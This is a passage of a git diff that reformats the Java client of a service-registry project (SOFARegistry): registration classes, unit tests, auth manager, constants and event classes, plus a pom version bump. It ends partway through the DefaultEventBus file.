@@ /** * The type Configurator registration. + * * @author zhuoyu.sjw * @version $Id : ConfiguratorRegistration.java, v 0.1 2018-04-20 11:36 zhuoyu.sjw Exp $$ */ public class ConfiguratorRegistration extends BaseRegistration { - private ConfigDataObserver configDataObserver; + private ConfigDataObserver configDataObserver; - /** - * Instantiates a new Configurator registration. - * - * @param dataId the data id - * @param configDataObserver the config data observer - */ - public ConfiguratorRegistration(String dataId, ConfigDataObserver configDataObserver) { - this.dataId = dataId; - this.configDataObserver = configDataObserver; - } + /** + * Instantiates a new Configurator registration. + * + * @param dataId the data id + * @param configDataObserver the config data observer + */ + public ConfiguratorRegistration(String dataId, ConfigDataObserver configDataObserver) { + this.dataId = dataId; + this.configDataObserver = configDataObserver; + } - /** - * Getter method for property configDataObserver. - * - * @return property value of configDataObserver - */ - public ConfigDataObserver getConfigDataObserver() { - return configDataObserver; - } + /** + * Getter method for property configDataObserver. + * + * @return property value of configDataObserver + */ + public ConfigDataObserver getConfigDataObserver() { + return configDataObserver; + } - /** - * Setter method for property configDataObserver. - * - * @param configDataObserver value to be assigned to property configDataObserver - */ - public void setConfigDataObserver(ConfigDataObserver configDataObserver) { - this.configDataObserver = configDataObserver; - } + /** + * Setter method for property configDataObserver. + * + * @param configDataObserver value to be assigned to property configDataObserver + */ + public void setConfigDataObserver(ConfigDataObserver configDataObserver) { + this.configDataObserver = configDataObserver; + } - /** - * @see Object#toString() - */ - @Override - public String toString() { - return "ConfiguratorRegistration{" + "dataId='" + dataId + '\'' + ", group='" + group - + '\'' + ", appName='" + appName + '\'' + '}'; - } + /** @see Object#toString() */ + @Override + public String toString() { + return "ConfiguratorRegistration{" + + "dataId='" + + dataId + + '\'' + + ", group='" + + group + + '\'' + + ", appName='" + + appName + + '\'' + + '}'; + } } diff --git a/client/api/src/main/java/com/alipay/sofa/registry/client/api/registration/PublisherRegistration.java b/client/api/src/main/java/com/alipay/sofa/registry/client/api/registration/PublisherRegistration.java index 8194b77c5..9dcc07710 100644 --- a/client/api/src/main/java/com/alipay/sofa/registry/client/api/registration/PublisherRegistration.java +++ b/client/api/src/main/java/com/alipay/sofa/registry/client/api/registration/PublisherRegistration.java @@ -24,23 +24,32 @@ */ public class PublisherRegistration extends BaseRegistration { - /** - * Instantiates a new Publisher registration. - * - * @param dataId the data id - */ - public PublisherRegistration(String dataId) { - this.dataId = dataId; - } + /** + * Instantiates a new Publisher registration. + * + * @param dataId the data id + */ + public PublisherRegistration(String dataId) { + this.dataId = dataId; + } - /** - * To string string. - * - * @return the string - */ - @Override - public String toString() { - return "PublisherRegistration{" + "dataId='" + dataId + '\'' + ", group='" + group + '\'' - + ", appName='" + appName + '\'' + '}'; - } + /** + * To string string. + * + * @return the string + */ + @Override + public String toString() { + return "PublisherRegistration{" + + "dataId='" + + dataId + + '\'' + + ", group='" + + group + + '\'' + + ", appName='" + + appName + + '\'' + + '}'; + } } diff --git a/client/api/src/main/java/com/alipay/sofa/registry/client/api/registration/SubscriberRegistration.java b/client/api/src/main/java/com/alipay/sofa/registry/client/api/registration/SubscriberRegistration.java index 83037d3c9..6534795a4 100644 --- a/client/api/src/main/java/com/alipay/sofa/registry/client/api/registration/SubscriberRegistration.java +++ b/client/api/src/main/java/com/alipay/sofa/registry/client/api/registration/SubscriberRegistration.java @@ -27,66 +27,78 @@ */ public class SubscriberRegistration extends BaseRegistration { - private ScopeEnum scopeEnum; + private ScopeEnum scopeEnum; - private SubscriberDataObserver subscriberDataObserver; + private SubscriberDataObserver subscriberDataObserver; - /** - * Instantiates a new Subscriber registration. - * - * @param dataId the data id - * @param subscriberDataObserver the subscriber data observer - */ - public SubscriberRegistration(String dataId, SubscriberDataObserver subscriberDataObserver) { - this.dataId = dataId; - this.subscriberDataObserver = subscriberDataObserver; - } + /** + * Instantiates a new Subscriber registration. + * + * @param dataId the data id + * @param subscriberDataObserver the subscriber data observer + */ + public SubscriberRegistration(String dataId, SubscriberDataObserver subscriberDataObserver) { + this.dataId = dataId; + this.subscriberDataObserver = subscriberDataObserver; + } - /** - * Getter method for property scopeEnum. - * - * @return property value of scopeEnum - */ - public ScopeEnum getScopeEnum() { - return scopeEnum; - } + /** + * Getter method for property scopeEnum. + * + * @return property value of scopeEnum + */ + public ScopeEnum getScopeEnum() { + return scopeEnum; + } - /** - * Setter method for property scopeEnum. - * - * @param scopeEnum value to be assigned to property scopeEnum - */ - public void setScopeEnum(ScopeEnum scopeEnum) { - this.scopeEnum = scopeEnum; - } + /** + * Setter method for property scopeEnum. + * + * @param scopeEnum value to be assigned to property scopeEnum + */ + public void setScopeEnum(ScopeEnum scopeEnum) { + this.scopeEnum = scopeEnum; + } - /** - * Getter method for property subscriberDataObserver. - * - * @return property value of subscriberDataObserver - */ - public SubscriberDataObserver getSubscriberDataObserver() { - return subscriberDataObserver; - } + /** + * Getter method for property subscriberDataObserver. + * + * @return property value of subscriberDataObserver + */ + public SubscriberDataObserver getSubscriberDataObserver() { + return subscriberDataObserver; + } - /** - * Setter method for property subscriberDataObserver. - * - * @param subscriberDataObserver value to be assigned to property subscriberDataObserver - */ - public void setSubscriberDataObserver(SubscriberDataObserver subscriberDataObserver) { - this.subscriberDataObserver = subscriberDataObserver; - } + /** + * Setter method for property subscriberDataObserver. + * + * @param subscriberDataObserver value to be assigned to property subscriberDataObserver + */ + public void setSubscriberDataObserver(SubscriberDataObserver subscriberDataObserver) { + this.subscriberDataObserver = subscriberDataObserver; + } - /** - * To string string. - * - * @return the string - */ - @Override - public String toString() { - return "SubscriberRegistration{" + "dataId='" + dataId + '\'' + ", group='" + group + '\'' - + ", appName='" + appName + '\'' + ", scopeEnum=" + scopeEnum - + ", subscriberDataObserver=" + subscriberDataObserver + '}'; - } + /** + * To string string. + * + * @return the string + */ + @Override + public String toString() { + return "SubscriberRegistration{" + + "dataId='" + + dataId + + '\'' + + ", group='" + + group + + '\'' + + ", appName='" + + appName + + '\'' + + ", scopeEnum=" + + scopeEnum + + ", subscriberDataObserver=" + + subscriberDataObserver + + '}'; + } } diff --git a/client/api/src/test/java/com/alipay/sofa/registry/client/api/exception/DuplicateExceptionTest.java b/client/api/src/test/java/com/alipay/sofa/registry/client/api/exception/DuplicateExceptionTest.java index 6fc2e74a9..7274c646e 100644 --- a/client/api/src/test/java/com/alipay/sofa/registry/client/api/exception/DuplicateExceptionTest.java +++ b/client/api/src/test/java/com/alipay/sofa/registry/client/api/exception/DuplicateExceptionTest.java @@ -19,27 +19,24 @@ import org.junit.Assert; import org.junit.Test; -/** - * @author GengZhang - */ +/** @author GengZhang */ public class DuplicateExceptionTest { - @Test - public void testConstruct() { - DuplicateException exception = new DuplicateException(); - Assert.assertNull(exception.getMessage()); - - exception = new DuplicateException("1"); - Assert.assertEquals("1", exception.getMessage()); + @Test + public void testConstruct() { + DuplicateException exception = new DuplicateException(); + Assert.assertNull(exception.getMessage()); - RuntimeException runtimeException = new RuntimeException("xxx"); - exception = new DuplicateException(runtimeException); - Assert.assertEquals("java.lang.RuntimeException: xxx", exception.getMessage()); - Assert.assertEquals(runtimeException, exception.getCause()); + exception = new DuplicateException("1"); + Assert.assertEquals("1", exception.getMessage()); - exception = new DuplicateException("1", runtimeException); - Assert.assertEquals("1", exception.getMessage()); - Assert.assertEquals(runtimeException, exception.getCause()); - } + RuntimeException runtimeException = new RuntimeException("xxx"); + exception = new DuplicateException(runtimeException); + Assert.assertEquals("java.lang.RuntimeException: xxx", exception.getMessage()); + Assert.assertEquals(runtimeException, exception.getCause()); -} \ No newline at end of file + exception = new DuplicateException("1", runtimeException); + Assert.assertEquals("1", exception.getMessage()); + Assert.assertEquals(runtimeException, exception.getCause()); + } +} diff --git a/client/api/src/test/java/com/alipay/sofa/registry/client/api/exception/RegistryClientExceptionTest.java b/client/api/src/test/java/com/alipay/sofa/registry/client/api/exception/RegistryClientExceptionTest.java index 7d45f61f9..6e7ac6d7c 100644 --- a/client/api/src/test/java/com/alipay/sofa/registry/client/api/exception/RegistryClientExceptionTest.java +++ b/client/api/src/test/java/com/alipay/sofa/registry/client/api/exception/RegistryClientExceptionTest.java @@ -19,26 +19,24 @@ import org.junit.Assert; import org.junit.Test; -/** - * @author GengZhang - */ +/** @author GengZhang */ public class RegistryClientExceptionTest { - @Test - public void testConstruct() { - RegistryClientException exception = new RegistryClientException(); - Assert.assertNull(exception.getMessage()); + @Test + public void testConstruct() { + RegistryClientException exception = new RegistryClientException(); + Assert.assertNull(exception.getMessage()); - exception = new RegistryClientException("1"); - Assert.assertEquals("1", exception.getMessage()); + exception = new RegistryClientException("1"); + Assert.assertEquals("1", exception.getMessage()); - RuntimeException runtimeException = new RuntimeException("xxx"); - exception = new RegistryClientException(runtimeException); - Assert.assertEquals("java.lang.RuntimeException: xxx", exception.getMessage()); - Assert.assertEquals(runtimeException, exception.getCause()); + RuntimeException runtimeException = new RuntimeException("xxx"); + exception = new RegistryClientException(runtimeException); + Assert.assertEquals("java.lang.RuntimeException: xxx", exception.getMessage()); + Assert.assertEquals(runtimeException, exception.getCause()); - exception = new RegistryClientException("1", runtimeException); - Assert.assertEquals("1", exception.getMessage()); - Assert.assertEquals(runtimeException, exception.getCause()); - } -} \ No newline at end of file + exception = new RegistryClientException("1", runtimeException); + Assert.assertEquals("1", exception.getMessage()); + Assert.assertEquals(runtimeException, exception.getCause()); + } +} diff --git a/client/api/src/test/java/com/alipay/sofa/registry/client/api/registration/BaseRegistrationTest.java b/client/api/src/test/java/com/alipay/sofa/registry/client/api/registration/BaseRegistrationTest.java index dcca6ba6e..84f252030 100644 --- a/client/api/src/test/java/com/alipay/sofa/registry/client/api/registration/BaseRegistrationTest.java +++ b/client/api/src/test/java/com/alipay/sofa/registry/client/api/registration/BaseRegistrationTest.java @@ -19,22 +19,19 @@ import org.junit.Assert; import org.junit.Test; -/** - * @author GengZhang - */ +/** @author GengZhang */ public class BaseRegistrationTest { - @Test - public void testAll() { - BaseRegistration registration = new BaseRegistration(); - registration.setAppName("app"); - registration.setDataId("dataId"); - registration.setGroup("group"); - Assert.assertEquals("app", registration.getAppName()); - Assert.assertEquals("dataId", registration.getDataId()); - Assert.assertEquals("group", registration.getGroup()); - Assert.assertEquals("BaseRegistration{dataId='dataId', group='group', appName='app'}", - registration.toString()); - } - -} \ No newline at end of file + @Test + public void testAll() { + BaseRegistration registration = new BaseRegistration(); + registration.setAppName("app"); + registration.setDataId("dataId"); + registration.setGroup("group"); + Assert.assertEquals("app", registration.getAppName()); + Assert.assertEquals("dataId", registration.getDataId()); + Assert.assertEquals("group", registration.getGroup()); + Assert.assertEquals( + "BaseRegistration{dataId='dataId', group='group', appName='app'}", registration.toString()); + } +} diff --git a/client/api/src/test/java/com/alipay/sofa/registry/client/api/registration/ConfiguratorRegistrationTest.java b/client/api/src/test/java/com/alipay/sofa/registry/client/api/registration/ConfiguratorRegistrationTest.java index 74f7889bc..218aa0378 100644 --- a/client/api/src/test/java/com/alipay/sofa/registry/client/api/registration/ConfiguratorRegistrationTest.java +++ b/client/api/src/test/java/com/alipay/sofa/registry/client/api/registration/ConfiguratorRegistrationTest.java @@ -21,23 +21,20 @@ import org.junit.Assert; import org.junit.Test; -/** - * @author GengZhang - */ +/** @author GengZhang */ public class ConfiguratorRegistrationTest { - @Test - public void testAll() { - ConfiguratorRegistration registration = new ConfiguratorRegistration("xxx", null); - Assert.assertEquals("xxx", registration.getDataId()); - Assert.assertNull(registration.getConfigDataObserver()); - registration.setConfigDataObserver(new ConfigDataObserver() { - @Override - public void handleData(String dataId, ConfigData configData) { - - } + @Test + public void testAll() { + ConfiguratorRegistration registration = new ConfiguratorRegistration("xxx", null); + Assert.assertEquals("xxx", registration.getDataId()); + Assert.assertNull(registration.getConfigDataObserver()); + registration.setConfigDataObserver( + new ConfigDataObserver() { + @Override + public void handleData(String dataId, ConfigData configData) {} }); - Assert.assertNotNull(registration.getConfigDataObserver()); - Assert.assertTrue(registration.toString().contains("xxx")); - } -} \ No newline at end of file + Assert.assertNotNull(registration.getConfigDataObserver()); + Assert.assertTrue(registration.toString().contains("xxx")); + } +} diff --git a/client/api/src/test/java/com/alipay/sofa/registry/client/api/registration/PublisherRegistrationTest.java b/client/api/src/test/java/com/alipay/sofa/registry/client/api/registration/PublisherRegistrationTest.java index bf37f97db..55df59dfd 100644 --- a/client/api/src/test/java/com/alipay/sofa/registry/client/api/registration/PublisherRegistrationTest.java +++ b/client/api/src/test/java/com/alipay/sofa/registry/client/api/registration/PublisherRegistrationTest.java @@ -19,15 +19,13 @@ import org.junit.Assert; import org.junit.Test; -/** - * @author GengZhang - */ +/** @author GengZhang */ public class PublisherRegistrationTest { - @Test - public void testAll() { - PublisherRegistration registration = new PublisherRegistration("xxx"); - Assert.assertEquals("xxx", registration.getDataId()); - Assert.assertTrue(registration.toString().contains("xxx")); - } -} \ No newline at end of file + @Test + public void testAll() { + PublisherRegistration registration = new PublisherRegistration("xxx"); + Assert.assertEquals("xxx", registration.getDataId()); + Assert.assertTrue(registration.toString().contains("xxx")); + } +} diff --git a/client/api/src/test/java/com/alipay/sofa/registry/client/api/registration/SubscriberRegistrationTest.java b/client/api/src/test/java/com/alipay/sofa/registry/client/api/registration/SubscriberRegistrationTest.java index 2cfb98e35..6d1b15e3e 100644 --- a/client/api/src/test/java/com/alipay/sofa/registry/client/api/registration/SubscriberRegistrationTest.java +++ b/client/api/src/test/java/com/alipay/sofa/registry/client/api/registration/SubscriberRegistrationTest.java @@ -22,25 +22,22 @@ import org.junit.Assert; import org.junit.Test; -/** - * @author GengZhang - */ +/** @author GengZhang */ public class SubscriberRegistrationTest { - @Test - public void testAll() { - SubscriberRegistration registration = new SubscriberRegistration("xxx", null); - Assert.assertEquals("xxx", registration.getDataId()); - Assert.assertNull(registration.getSubscriberDataObserver()); - registration.setSubscriberDataObserver(new SubscriberDataObserver() { - @Override - public void handleData(String dataId, UserData data) { - - } + @Test + public void testAll() { + SubscriberRegistration registration = new SubscriberRegistration("xxx", null); + Assert.assertEquals("xxx", registration.getDataId()); + Assert.assertNull(registration.getSubscriberDataObserver()); + registration.setSubscriberDataObserver( + new SubscriberDataObserver() { + @Override + public void handleData(String dataId, UserData data) {} }); - Assert.assertNotNull(registration.getSubscriberDataObserver()); - registration.setScopeEnum(ScopeEnum.dataCenter); - Assert.assertEquals(ScopeEnum.dataCenter, registration.getScopeEnum()); - Assert.assertTrue(registration.toString().contains("xxx")); - } -} \ No newline at end of file + Assert.assertNotNull(registration.getSubscriberDataObserver()); + registration.setScopeEnum(ScopeEnum.dataCenter); + Assert.assertEquals(ScopeEnum.dataCenter, registration.getScopeEnum()); + Assert.assertTrue(registration.toString().contains("xxx")); + } +} diff --git a/client/api/src/test/java/com/alipay/sofa/registry/core/model/ReceivedConfigDataTest.java b/client/api/src/test/java/com/alipay/sofa/registry/core/model/ReceivedConfigDataTest.java index 72bf3a01f..12332a4cb 100644 --- a/client/api/src/test/java/com/alipay/sofa/registry/core/model/ReceivedConfigDataTest.java +++ b/client/api/src/test/java/com/alipay/sofa/registry/core/model/ReceivedConfigDataTest.java @@ -16,32 +16,28 @@ */ package com.alipay.sofa.registry.core.model; +import java.util.Arrays; import org.junit.Assert; import org.junit.Test; -import java.util.Arrays; - -/** - * @author GengZhang - */ +/** @author GengZhang */ public class ReceivedConfigDataTest { - @Test - public void testAll() { - ReceivedConfigData data = new ReceivedConfigData(); - data.setDataId("dataIdd"); - data.setGroup("groupp"); - data.setInstanceId("instanceIdd"); - data.setConfiguratorRegistIds(Arrays.asList("id1", "id2")); - data.setDataBox(new DataBox()); - data.setVersion(1234L); - Assert.assertEquals("dataIdd", data.getDataId()); - Assert.assertEquals("groupp", data.getGroup()); - Assert.assertEquals("instanceIdd", data.getInstanceId()); - Assert.assertEquals(2, data.getConfiguratorRegistIds().size()); - Assert.assertNotNull(data.getDataBox()); - Assert.assertEquals(1234L, (long) data.getVersion()); - Assert.assertTrue(data.toString().contains("instanceIdd")); - } - -} \ No newline at end of file + @Test + public void testAll() { + ReceivedConfigData data = new ReceivedConfigData(); + data.setDataId("dataIdd"); + data.setGroup("groupp"); + data.setInstanceId("instanceIdd"); + data.setConfiguratorRegistIds(Arrays.asList("id1", "id2")); + data.setDataBox(new DataBox()); + data.setVersion(1234L); + Assert.assertEquals("dataIdd", data.getDataId()); + Assert.assertEquals("groupp", data.getGroup()); + Assert.assertEquals("instanceIdd", data.getInstanceId()); + Assert.assertEquals(2, data.getConfiguratorRegistIds().size()); + Assert.assertNotNull(data.getDataBox()); + Assert.assertEquals(1234L, (long) data.getVersion()); + Assert.assertTrue(data.toString().contains("instanceIdd")); + } +} diff --git a/client/api/src/test/java/com/alipay/sofa/registry/core/model/ReceivedDataTest.java b/client/api/src/test/java/com/alipay/sofa/registry/core/model/ReceivedDataTest.java index 1fe5e45e1..8766ce282 100644 --- a/client/api/src/test/java/com/alipay/sofa/registry/core/model/ReceivedDataTest.java +++ b/client/api/src/test/java/com/alipay/sofa/registry/core/model/ReceivedDataTest.java @@ -16,43 +16,40 @@ */ package com.alipay.sofa.registry.core.model; -import org.junit.Assert; -import org.junit.Test; - import java.util.Arrays; import java.util.HashMap; import java.util.List; +import org.junit.Assert; +import org.junit.Test; -/** - * @author GengZhang - */ +/** @author GengZhang */ public class ReceivedDataTest { - @Test - public void testAll() { + @Test + public void testAll() { - ReceivedData data = new ReceivedData(); - data.setDataId("dataIdd"); - data.setGroup("groupp"); - data.setInstanceId("instanceIdd"); - data.setSubscriberRegistIds(Arrays.asList("id1", "id2")); - data.setLocalZone("local"); - data.setScope("zone"); - data.setData(new HashMap>()); - data.setSegment("seg1"); - data.setVersion(1234L); - Assert.assertEquals("dataIdd", data.getDataId()); - Assert.assertEquals("groupp", data.getGroup()); - Assert.assertEquals("instanceIdd", data.getInstanceId()); - Assert.assertEquals(2, data.getSubscriberRegistIds().size()); - Assert.assertEquals("zone", data.getScope()); - Assert.assertEquals("seg1", data.getSegment()); - Assert.assertEquals("local", data.getLocalZone()); - Assert.assertEquals(1234L, (long) data.getVersion()); - Assert.assertEquals(0, data.getData().size()); - Assert.assertTrue(data.toString().contains("instanceIdd")); + ReceivedData data = new ReceivedData(); + data.setDataId("dataIdd"); + data.setGroup("groupp"); + data.setInstanceId("instanceIdd"); + data.setSubscriberRegistIds(Arrays.asList("id1", "id2")); + data.setLocalZone("local"); + data.setScope("zone"); + data.setData(new HashMap>()); + data.setSegment("seg1"); + data.setVersion(1234L); + Assert.assertEquals("dataIdd", data.getDataId()); + Assert.assertEquals("groupp", data.getGroup()); + Assert.assertEquals("instanceIdd", data.getInstanceId()); + Assert.assertEquals(2, data.getSubscriberRegistIds().size()); + Assert.assertEquals("zone", data.getScope()); + Assert.assertEquals("seg1", data.getSegment()); + Assert.assertEquals("local", data.getLocalZone()); + Assert.assertEquals(1234L, (long) data.getVersion()); + Assert.assertEquals(0, data.getData().size()); + Assert.assertTrue(data.toString().contains("instanceIdd")); - ReceivedData data1 = new ReceivedData(null, null, null, null, null, null, null); - Assert.assertNull(data1.getVersion()); - } -} \ No newline at end of file + ReceivedData data1 = new ReceivedData(null, null, null, null, null, null, null); + Assert.assertNull(data1.getVersion()); + } +} diff --git a/client/api/src/test/java/com/alipay/sofa/registry/core/model/ResultTest.java b/client/api/src/test/java/com/alipay/sofa/registry/core/model/ResultTest.java index af5fc00f0..7f140051f 100644 --- a/client/api/src/test/java/com/alipay/sofa/registry/core/model/ResultTest.java +++ b/client/api/src/test/java/com/alipay/sofa/registry/core/model/ResultTest.java @@ -19,18 +19,16 @@ import org.junit.Assert; import org.junit.Test; -/** - * @author GengZhang - */ +/** @author GengZhang */ public class ResultTest { - @Test - public void testAll() { - Result result = new Result(); - result.setSuccess(false); - result.setMessage("xxx"); - Assert.assertFalse(result.isSuccess()); - Assert.assertEquals("xxx", result.getMessage()); - Assert.assertTrue(result.toString().contains("xxx")); - } -} \ No newline at end of file + @Test + public void testAll() { + Result result = new Result(); + result.setSuccess(false); + result.setMessage("xxx"); + Assert.assertFalse(result.isSuccess()); + Assert.assertEquals("xxx", result.getMessage()); + Assert.assertTrue(result.toString().contains("xxx")); + } +} diff --git a/client/api/src/test/java/com/alipay/sofa/registry/core/model/ScopeEnumTest.java b/client/api/src/test/java/com/alipay/sofa/registry/core/model/ScopeEnumTest.java index a0d600872..dc44a0be9 100644 --- a/client/api/src/test/java/com/alipay/sofa/registry/core/model/ScopeEnumTest.java +++ b/client/api/src/test/java/com/alipay/sofa/registry/core/model/ScopeEnumTest.java @@ -19,14 +19,12 @@ import org.junit.Assert; import org.junit.Test; -/** - * @author GengZhang - */ +/** @author GengZhang */ public class ScopeEnumTest { - @Test - public void contains() { - Assert.assertTrue(ScopeEnum.contains("zone")); - Assert.assertFalse(ScopeEnum.contains("xxxx")); - } -} \ No newline at end of file + @Test + public void contains() { + Assert.assertTrue(ScopeEnum.contains("zone")); + Assert.assertFalse(ScopeEnum.contains("xxxx")); + } +} diff --git a/client/impl/pom.xml b/client/impl/pom.xml index e9a54b4c5..b1b92d4e9 100644 --- a/client/impl/pom.xml +++ b/client/impl/pom.xml @@ -5,7 +5,7 @@ com.alipay.sofa registry-client-parent - 5.2.0-SNAPSHOT + 6.0.1 ../pom.xml 4.0.0 diff --git a/client/impl/src/main/java/com/alipay/sofa/registry/client/auth/AuthManager.java b/client/impl/src/main/java/com/alipay/sofa/registry/client/auth/AuthManager.java index ed346bd3f..92e19ec2f 100644 --- a/client/impl/src/main/java/com/alipay/sofa/registry/client/auth/AuthManager.java +++ b/client/impl/src/main/java/com/alipay/sofa/registry/client/auth/AuthManager.java @@ -17,21 +17,21 @@ package com.alipay.sofa.registry.client.auth; import com.alipay.sofa.registry.core.model.BaseRegister; - import java.util.Map; /** * The interface Auth manager. + * * @author zhuoyu.sjw * @version $Id : AuthManager.java, v 0.1 2018-04-18 12:12 zhuoyu.sjw Exp $$ */ public interface AuthManager { - /** - * Gets auth content. - * - * @param register the register - * @return the auth content - */ - Map getAuthContent(BaseRegister register); + /** + * Gets auth content. + * + * @param register the register + * @return the auth content + */ + Map getAuthContent(BaseRegister register); } diff --git a/client/impl/src/main/java/com/alipay/sofa/registry/client/auth/NoopAuthManager.java b/client/impl/src/main/java/com/alipay/sofa/registry/client/auth/NoopAuthManager.java index 3f03e5de0..e296a463d 100644 --- a/client/impl/src/main/java/com/alipay/sofa/registry/client/auth/NoopAuthManager.java +++ b/client/impl/src/main/java/com/alipay/sofa/registry/client/auth/NoopAuthManager.java @@ -17,30 +17,27 @@ package com.alipay.sofa.registry.client.auth; import com.alipay.sofa.registry.core.model.BaseRegister; - import java.util.HashMap; import java.util.Map; /** - * * @author zhuoyu.sjw * @version $Id: NoopAuthManager.java, v 0.1 2018-04-18 12:13 zhuoyu.sjw Exp $$ */ public final class NoopAuthManager implements AuthManager { - public static final AuthManager INSTANCE = new NoopAuthManager(); + public static final AuthManager INSTANCE = new NoopAuthManager(); - private NoopAuthManager() { - } + private NoopAuthManager() {} - /** - * Gets auth content. - * - * @param register the register - * @return the auth content - */ - @Override - public Map getAuthContent(BaseRegister register) { - return new HashMap(); - } + /** + * Gets auth content. + * + * @param register the register + * @return the auth content + */ + @Override + public Map getAuthContent(BaseRegister register) { + return new HashMap(); + } } diff --git a/client/impl/src/main/java/com/alipay/sofa/registry/client/constants/ValueConstants.java b/client/impl/src/main/java/com/alipay/sofa/registry/client/constants/ValueConstants.java index 4ca2605d8..fffa34fa0 100644 --- a/client/impl/src/main/java/com/alipay/sofa/registry/client/constants/ValueConstants.java +++ b/client/impl/src/main/java/com/alipay/sofa/registry/client/constants/ValueConstants.java @@ -18,23 +18,18 @@ /** * The type Value constants. + * * @author zhuoyu.sjw * @version $Id : ValueConstants.java, v 0.1 2017-11-30 20:03 zhuoyu.sjw Exp $$ */ public class ValueConstants { - /** - * The constant DEFAULT_GROUP. - */ - public static final String DEFAULT_GROUP = "DEFAULT_GROUP"; + /** The constant DEFAULT_GROUP. */ + public static final String DEFAULT_GROUP = "DEFAULT_GROUP"; - /** - * The constant DEFAULT_ZONE. - */ - public static final String DEFAULT_ZONE = "DEFAULT_ZONE"; + /** The constant DEFAULT_ZONE. */ + public static final String DEFAULT_ZONE = "DEFAULT_ZONE"; - /** - * The constant DEFAULT_DATA_CENTER. - */ - public static final String DEFAULT_DATA_CENTER = "DefaultDataCenter"; + /** The constant DEFAULT_DATA_CENTER. */ + public static final String DEFAULT_DATA_CENTER = "DefaultDataCenter"; } diff --git a/client/impl/src/main/java/com/alipay/sofa/registry/client/constants/VersionConstants.java b/client/impl/src/main/java/com/alipay/sofa/registry/client/constants/VersionConstants.java index 8c8ff2040..4b3c56760 100644 --- a/client/impl/src/main/java/com/alipay/sofa/registry/client/constants/VersionConstants.java +++ b/client/impl/src/main/java/com/alipay/sofa/registry/client/constants/VersionConstants.java @@ -17,11 +17,10 @@ package com.alipay.sofa.registry.client.constants; /** - * * @author zhuoyu.sjw * @version $Id: VersionConstants.java, v 0.1 2017-11-23 22:36 zhuoyu.sjw Exp $$ */ public class VersionConstants { - public static final long UNINITIALIZED_VERSION = 0; + public static final long UNINITIALIZED_VERSION = 0; } diff --git a/client/impl/src/main/java/com/alipay/sofa/registry/client/event/ConfiguratorProcessEvent.java b/client/impl/src/main/java/com/alipay/sofa/registry/client/event/ConfiguratorProcessEvent.java index c5ba46c17..9a1715565 100644 --- a/client/impl/src/main/java/com/alipay/sofa/registry/client/event/ConfiguratorProcessEvent.java +++ b/client/impl/src/main/java/com/alipay/sofa/registry/client/event/ConfiguratorProcessEvent.java @@ -21,118 +21,123 @@ import com.alipay.sofa.registry.client.api.model.Event; /** - * * @author zhuoyu.sjw * @version $Id: ConfiguratorProcessEvent.java, v 0.1 2018-07-13 18:44 zhuoyu.sjw Exp $$ */ public class ConfiguratorProcessEvent implements Event { - private Configurator configurator; - - private RegistryClientConfig config; - - private long start; - - private long end; - - private Throwable throwable; - - /** - * Getter method for property configurator. - * - * @return property value of configurator - */ - public Configurator getConfigurator() { - return configurator; - } - - /** - * Setter method for property configurator. - * - * @param configurator value to be assigned to property configurator - */ - public void setConfigurator(Configurator configurator) { - this.configurator = configurator; - } - - /** - * Getter method for property config. - * - * @return property value of config - */ - public RegistryClientConfig getConfig() { - return config; - } - - /** - * Setter method for property config. - * - * @param config value to be assigned to property config - */ - public void setConfig(RegistryClientConfig config) { - this.config = config; - } - - /** - * Getter method for property start. - * - * @return property value of start - */ - public long getStart() { - return start; - } - - /** - * Setter method for property start. - * - * @param start value to be assigned to property start - */ - public void setStart(long start) { - this.start = start; - } - - /** - * Getter method for property end. - * - * @return property value of end - */ - public long getEnd() { - return end; - } - - /** - * Setter method for property end. - * - * @param end value to be assigned to property end - */ - public void setEnd(long end) { - this.end = end; - } - - /** - * Getter method for property throwable. - * - * @return property value of throwable - */ - public Throwable getThrowable() { - return throwable; - } - - /** - * Setter method for property throwable. - * - * @param throwable value to be assigned to property throwable - */ - public void setThrowable(Throwable throwable) { - this.throwable = throwable; - } - - /** - * @see Object#toString() - */ - @Override - public String toString() { - return "ConfiguratorProcessEvent{" + "configurator=" + configurator + ", start=" + start - + ", end=" + end + ", throwable=" + throwable + '}'; - } + private Configurator configurator; + + private RegistryClientConfig config; + + private long start; + + private long end; + + private Throwable throwable; + + /** + * Getter method for property configurator. + * + * @return property value of configurator + */ + public Configurator getConfigurator() { + return configurator; + } + + /** + * Setter method for property configurator. + * + * @param configurator value to be assigned to property configurator + */ + public void setConfigurator(Configurator configurator) { + this.configurator = configurator; + } + + /** + * Getter method for property config. + * + * @return property value of config + */ + public RegistryClientConfig getConfig() { + return config; + } + + /** + * Setter method for property config. + * + * @param config value to be assigned to property config + */ + public void setConfig(RegistryClientConfig config) { + this.config = config; + } + + /** + * Getter method for property start. + * + * @return property value of start + */ + public long getStart() { + return start; + } + + /** + * Setter method for property start. + * + * @param start value to be assigned to property start + */ + public void setStart(long start) { + this.start = start; + } + + /** + * Getter method for property end. + * + * @return property value of end + */ + public long getEnd() { + return end; + } + + /** + * Setter method for property end. + * + * @param end value to be assigned to property end + */ + public void setEnd(long end) { + this.end = end; + } + + /** + * Getter method for property throwable. + * + * @return property value of throwable + */ + public Throwable getThrowable() { + return throwable; + } + + /** + * Setter method for property throwable. + * + * @param throwable value to be assigned to property throwable + */ + public void setThrowable(Throwable throwable) { + this.throwable = throwable; + } + + /** @see Object#toString() */ + @Override + public String toString() { + return "ConfiguratorProcessEvent{" + + "configurator=" + + configurator + + ", start=" + + start + + ", end=" + + end + + ", throwable=" + + throwable + + '}'; + } } diff --git a/client/impl/src/main/java/com/alipay/sofa/registry/client/event/DefaultEventBus.java b/client/impl/src/main/java/com/alipay/sofa/registry/client/event/DefaultEventBus.java index 410469c1f..cd7da1752 100644 --- a/client/impl/src/main/java/com/alipay/sofa/registry/client/event/DefaultEventBus.java +++ b/client/impl/src/main/java/com/alipay/sofa/registry/client/event/DefaultEventBus.java @@ -23,8 +23,6 @@ import com.alipay.sofa.registry.client.factory.NamedThreadFactory; import com.alipay.sofa.registry.client.log.LoggerFactory; import com.alipay.sofa.registry.client.util.CommonUtils; -import org.slf4j.Logger; - import java.util.concurrent.ConcurrentHashMap; import java.util.concurrent.ConcurrentMap; import java.util.concurrent.CopyOnWriteArraySet; @@ -32,121 +30,124 @@ import java.util.concurrent.LinkedBlockingDeque; import java.util.concurrent.ThreadPoolExecutor; import java.util.concurrent.TimeUnit; +import org.slf4j.Logger; /** * The type Default event bus. + * * @author zhanggeng.zg * @author zhuoyu.sjw * @version $Id : DefaultEventBus.java, v 0.1 2018-07-13 10:56 zhuoyu.sjw Exp $$ */ public class DefaultEventBus implements EventBus { - /** LOGGER */ - private static final Logger LOGGER = LoggerFactory 